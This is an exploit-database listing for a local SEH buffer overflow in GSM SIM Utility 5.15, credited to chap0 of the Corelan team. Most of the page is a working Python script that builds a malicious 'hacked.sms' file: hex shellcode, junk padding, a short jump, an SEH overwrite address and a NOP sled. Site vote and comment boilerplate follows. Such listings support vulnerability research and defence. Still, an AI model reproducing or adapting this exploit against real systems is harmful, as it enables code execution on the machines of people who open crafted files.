GSM SIM Utility sms file Local SEH BoF

2010.06.29
Credit: chap0
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title : GSM SIM Utility sms file Local SEH BoF # Date : June 28, 2010 # Author : chap0 [www.seek-truth.net] # Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol # Version : 5.15 # OS : Windows XP SP3 # Type of vuln : SEH # Greetz to : Corelan Security Team * Special Greetz to Lincoln # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054 # The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # Code: import time print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] GSM SIM Utility SEH Local Exploit\n" sc =("d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e" "208b36384f1875f35901d1ffe160" "8b6c24248b453c8b54057801ea8b" "4a188b5a2001ebe337498b348b01" "ee31ff31c0fcac84c0740ac1cf0d" "01c7e9f1ffffff3b7c242875de8b" "5a2401eb668b0c4b8b5a1c01eb8b" "048b01e88944241c61c3b20829d4" "89e589c2688e4e0eec52e89cffff" "ff894504bb7ed8e273871c2452e8" "8bffffff894508686c6c20ff6833" "322e646875736572885c240a89e6" "56ff550489c250bba8a24dbc871c" "2452e85effffff68703058206820" "6368616864204279686f69746568" "4578706c31db885c241289e3686b" "58202068426c6163687468652068" "75676820685468726f31c9884c24" "1189e131d252535152ffd031c050" "ff5508") buf= "A" * 1834 buf+= "eb069090" buf+= "F25E4300" buf+= "90" * 20 buf+= sc try: crash = open("hacked.sms",'w') crash.write(buf) crash.close() print "[+] Visit www.corelan.be port 8800!\n" except: print "Error occured, look at the code!\n" time.sleep(2) print "[+] Exploit file created!\n"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top